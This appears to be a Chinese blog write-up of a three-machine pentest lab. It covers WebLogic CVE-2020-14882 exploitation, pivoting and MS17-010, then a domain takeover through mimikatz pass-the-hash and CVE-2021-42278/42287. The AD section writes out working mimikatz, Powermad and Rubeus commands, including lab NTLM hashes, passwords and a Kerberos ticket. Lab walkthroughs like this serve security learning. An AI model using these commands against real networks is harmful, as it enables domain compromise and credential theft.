提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
前言
2022 弱口令安全实验室招新赛开始之前看到了报名信息,后面忘记报名了,群里也是看到大佬们在讨论这个靶场,耐不住向某个报名了靶机挑战通道的师傅要了一份靶场,打打看。由于上课加搞毕设开题答辩,今天写一下打靶场记录。
提示:以下是本篇文章正文内容
靶场说明:
需要下载完成三个虚拟机,组成一个内网环境,全部搭建完成后组网才可完成题目。
三台的顺序是 ubuntu -server08 -server08DC
无需修改二三台的网卡
第一台ubuntu的ip可以查看一下自己虚拟机的nat网段来进行推断,二三台访问不到是正常情况,因为是内网靶场
一、ubuntu 代码执行getshell
第一台是ubuntu系统,nat 网段 我这里是192.168.216.0/24 段,ubuntu 的ip是:192.168.216.146
直接使用fsan进行扫描:
扫描结果开启两个端口:一个是22端口 ssh服务, 另一个是7005 weblogic 。另外还扫描出了未授权访问漏洞。
访问登录页,可以看到版本是 12.2.1.3 ,这个版本的漏洞也不少
获取webshell
测试发现是存在远程代码执行漏洞CVE-2020-14882的
执行id 命令,响应包中返回了结果
当前路径:/home/netuser/weblogic/Oracle/Middleware/user_projects/domains/base_domain
利用 wget 下载webshell到可访问的静态路径中
使用python3 启动一个http服务端 可以看到服务端被访问了
访问存在
哥斯拉连接
当前的一个webshell权限是很低的一个weblogic 用户权限,通过查看passwd文件知道,netuser用户与root是可以进行登录的用户。
这里花费了大半天的时间尝试suid提权,内核漏洞提权,敏感信息搜索等等都提权不成功,linux下的提权还是提得少了。然后没有提权直接进入打内网环境。
二、server 2008r2
在前期信息收集中发现存在192.168.107.1/24内网网段,提权无果之后,准备对内网中的其他机器进行横向
直接上fscan 扫描一波,在扫到的另外一台192.168.107.128 主机存在ms17010 漏洞,最后全端口扫描了一波最后还发现开启了47001端口 WinRM服务。
没有其他更多的信息, 选择先使用ms17010打一波。由于192.168.107.128/24 段不能从外面直接访问,属于内网段中。搭建流量代理。
EW 流量代理
上传ew流量代理工具到ubuntu上,进行一个反向流量代理
攻击机上开启监听
给权限后执行
本地配合Proxifier 配置ew流量代理
ms17010
直接起msf ,确认一下存在ms17010
这里由于是处于深层的内网中,考虑选择payload 为正向连接
server08r2这个账户登录过,看了进程是没有存在杀软,考虑直接上mimikatz读取内存
从内存中得到server08r2 账户的明文密码:NcJVPV3w9Wf7
还有一个当前域机器WIN-S96L5Q5A734$用户的ntlm
得到明文,发现3389 rdp服务没开,注册表开启
最后使用server08r2 用户进行登录,从最近访问位置中启动项找到flag.bat 运行后在桌面生成flag2
三、AD机器账号伪造漏洞
拿下第二台server2008 之后,通过ipconfig /all 发现了 另外一个内网段,192.168.48.1/24 ,并且是可能存在域的
可以看到是存在域环境的,但是由于我们当前登录的用户不是域用户,会提示拒绝访问
nbtscan 扫描得出 192.168.48.128 是域控DC
fscan 扫描 DC,发现也是存在ms17010 永恒之蓝漏洞的,这里也是想使用ms17010 直接拿下
但是后面利用ms17010 来打的时候很不稳定,弹回来的shell也会提示RPC错误,拒绝访问等等错误甚至会重启,从前面的来看一旦重启 lsass的内存信息就会丢失,抓不到用户明文密码。SERVER08R2 用户密码也不存在重用的情况。
这里使用域AD机器账号伪造漏洞 来达到一个提权
此时我们是拥有当前一个机器账户win-s96l5q5a734$ 的ntlm hash密文,可以利用ntlm hash进行一个hash 传递来获取域访问权限进行信息收集,或者看看能不能利用域漏洞进行提权或者其他的操作。
账户:win-s96l5q5a734$
ntlm:765886434d8392af3380b0d97638a7e0
域内hash传递攻击
使用mimakatz 进行一个ntlm 哈希传递攻击,在弹出的cmd窗口中进行的域控时间访问正常返回了。此时已经获得了一个域win-s96l5q5a734$机器账户的权限
提升权限
privilege::debug
使用win-s96l5q5a734$的NTLM hash值进行hash传递攻击,域:weak.com
sekurlsa::pth /user:win-s96l5q5a734$ /domain:weak.com /ntlm:765886434d8392af3380b0d97638a7e0
查看域内用户及域管理员组
weak-dc 账户是一个本地管理员组的用户
简单的查看了一下域内信息,看能不能利用域漏洞提权,之前刚好学习AD机器账号伪造漏洞,所以直接试一下
这里简单描述一下漏洞,具体的漏洞及协议细节可自行了解学习
在域内一般正常的机器账户时以"$" 符号结尾,且AD没有对域内机器账户进行检查,就可以存在不以"$" 符号结尾的域内机器账户名
漏洞形成点:
1.在创建一个新的域内机器账号时,利用CVE-2021-42278漏洞对当前新键机器账号伪造修改为域AD的机器账号一样账户名。
2.再擦除当前机器账号的spn信息
3.由于当前机器账号修改后与AD机器账号名一样,这时候去向kdc请求TGT,这时得到TGT中的PAC仍然是当前新建机器账户的权限
4.再修改当前机器账号与前面不一样的机器账号名。
5.使用得到的TGT通过S4U2self进行TGS请求
6.域控在找不到刚刚伪造的机器用户后,就在给TGT中的client info中的username加一个$,然后再去查询username$,
发现这个TGT client 域控机器账户自己,然后就把自己的PAC加入TS中,并且用自己的hash加密了TS,最后返回。
7.伪造者就得到了访问域控的TGS
接下来上传所需要的AD机器账号伪造漏洞攻击用的工具到机器上:
Powermad.ps1
PowerView.ps1
Rubeus.exe
使用刚刚hash传递攻击弹出的cmd窗口启动powershell进行操作,导入用到的两个powershell脚本
powershell -ExecutionPolicy Bypass
Import-Module .\Powermad.ps1
Import-Module .\PowerView.ps1
创建一个域机器账户,需要输入密码
New-MachineAccount -MachineAccount test -Domain weak.com -DomainController WIN-JK2FG246GEF.weak.com -Verbose
清除机器账户的spn信息
Set-DomainObject "CN=test,CN=Computers,DC=weak,DC=com" -Clear 'serviceprincipalname' -Verbose
重设机器名称,设置为DC域控机器名,伪造dc账户
Set-MachineAccountAttribute -MachineAccount test -Value "WIN-JK2FG246GEF" -Attribute samaccountname -Verbose
请求TGT票据
./Rubeus.exe asktgt /user:WIN-JK2FG246GEF /password:AvtBn123! /domain:weak.com /dc:WIN-JK2FG246GEF.weak.com /nowrap
查看票据
恢复创建的机器账号名,但要与原来的名称不一样。用于另外一个漏洞的触发条件
Set-MachineAccountAttribute -MachineAccount test -Value "test2" -Attribute samaccountname -Verbose
通过S4U2self申请TGS Ticket,获取DC ldap服务票据
./Rubeus.exe s4u /self /impersonateuser:"weak-dc" /altservice:"ladp/WIN-JK2FG246GEF.weak.com" /dc:"WIN-JK2FG246GEF.weak.com" /ptt /ticket:doIE8DCCBOygAwIBBaEDAgEWooIECjCCBAZhggQCMIID/qADAgEFoQobCFdFQUsuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0Gwh3ZWFrLmNvbaOCA8owggPGoAMCARKhAwIBAqKCA7gEggO0Eix8k0tTQXIMyX7cpnJPcHm53ZmwQuGgNbEYPZfvapcKphQvyn/MeVn8fKVYkf6Pr7/63swZhX3PRLmLdKqtcgfj+F79ef0P+ei8Kxu2SHVisYd+3ZfuSsej2Ldgba7w2UKj4uAR3GSO85Mi6dXJPweWXde3X2jQgM9jcZJs0Vh0qHr4IxlJjEXb2jbUtiPtTmCVDzrXe5WnxqtcwJzaO9vkGq+LDvEflyMX0sRqIFEr4eMJpzkFUXOa2TvVuFwl54lECJo6ZqsD8z/n7TVm8LmX63d92FJce9PWqSrUjDiIY9OWPm8VfEO6iVf0mvl2lYRaMEPvw9lc1PZ7LSjPQ3FOmeGeZcXoWEGlQBc0Oh0jUtHMWs66Qdc0Zw5g9XBbsJAm8LTf32dJCYBe73fc/Ai7xcqDDxqLYoKeu9YGvoE/4htbtrFwww/iJxgJIn30er4IlavokXdo3pwR4SCYxf+ndUe2N1EPuUUuM3E2yexpx7hzwGaFbSh3TQqMqRGQqGOCsUcq9APTSD8zv1w3nJE/yI0KfdLOJOU9puos7/E0x8GE77kwXYZn5y7ZwngVsVGsjbxHHIlyE9HwW2PwcUzP8h4RqFdW7Jn5lKVMC5Q7Ocayjgu5YSt4TDHR2Ws6nffewCfdGM1AxGn3EVXjFN05t0Fv+lMxmmGIMOKNDASbMEI2Wig7Rb0JEYrk+ZX/x30PXgq75InNvyBuiOeCyrcMBmaTQdwv4+f2qqS0pjyrqGgiMM2fJMlOLSLrxOOwomWXntRZxnbg2luUX0cvbdpUmSdyYlDYmXqNZl0wCEAR8sLVbOkj17ygPBFHbuxIlqVSm5ra3hupMa3Ti0YxXf20CRNptWSYt0r+0zBdFgHaVJyzHi/9oytMcWIk12GK6f0vDVftmwJAFDMUYRctGayEynp3JwmjAf5knac6Yo7syP/KJDqgvKIWkGD4i3VJ7UNmATuT3mC17CZjf79PMIjnXudXRGfvvPkDCUdrFtZ7WkonYCXc6kv97/aWKBLlHUldHXl4Snb/NFvDtyg/qw+AUJzeGdo5PbsO2TfYgjUTkjP5Z1kJr5AshKAel/bP1Yu/JWTP/WzsjE2x+OdfSm2yuhfLc4RUfi9KRkjlEgHBuudZgXqQu8mvlF/DtDuN6BtdpyiqSR8qde1PR39Md7KBopj3GhsapF+J/2p8JPIl0OH1OcLcdpY/cAwga+Ek9IN9K6gb8RWeXPVGRjr44xNtx/PYe/B2XMYmGj7fyT1PTtlKo4HRMIHOoAMCAQCigcYEgcN9gcAwgb2ggbowgbcwgbSgGzAZoAMCARehEgQQUfA6UoL7rxdMC2jnGhR0maEKGwhXRUFLLkNPTaIcMBqgAwIBAaETMBEbD1dJTi1KSzJGRzI0NkdFRqMHAwUAQOAAAKURGA8yMDIyMTExNTE2MTg1N1qmERgPMjAyMjExMTYwMjE4NTdapxEYDzIwMjIxMTIyMTYxODU3WqgKGwhXRUFLLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsId2Vhay5jb20=
申请cifs服务票据
可以看到,已经得到了ldap服务与cifs服务票据
查看dc上的文件
有了服务票据之后,利用DCSync 导出域内所有用户的hash
用户的hash到手之后,cmd5跑了一波weak-dc与Administrator用户都是跑不出来,密码挺复杂看来。
直接使用Administrator域管理员的ntlm 进行高权限的hash传递攻击
privilege::debug
sekurlsa::pth /user:Administrator /domain:weak.com /ntlm:597e2e3805b87b5e3e52798392a55b6a
在攻击成功弹出来的cmd窗口中,由于已经是一个域管理员Administrator高权限的cmd窗口,直接对域控DC进行ipc$连接是不需要输入密码的。 使用psexec 进行一个横向渗透
当前已连接到域控DC
查看当前已登录用户,weak-dc登录过,上mimakatz抓明文密码
query user
上传mimaktz到域控DC上
dump 内存明文密码
得到weak-dc 用户密码:7sYUVa%kFA7]
登录域控
这里如果想要登录到域控,域控是没有开启3389远程登录的,需要开启,并且把weak-dc 用户加入远程登录用户组中
使用当前用户启动的mstsc登录,修改完之后登录还会显示拒绝,因为当前本机用户没有权限登录,而且编辑不了登录的用户
使用hash传递攻击的高权限窗口启动mstsc,输入weak-dc用户的密码登录;或者在当前机器用也添加weak-dc 用户远程登录权限,退出后以weak-dc 登录本机,再登录域控DC
最后在启动中找到flag.bat 运行后就可以得到flag3
总结
还行,对linux下的提权还是不太掌握,另外在真实环境中也会存在ms17010漏洞攻击不稳定的情况,一旦蓝屏重启之类的,内存中的明文密码就会丢失。不到万不得以最好是在有把握稳定反弹shell的情况下利用ms17010。
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
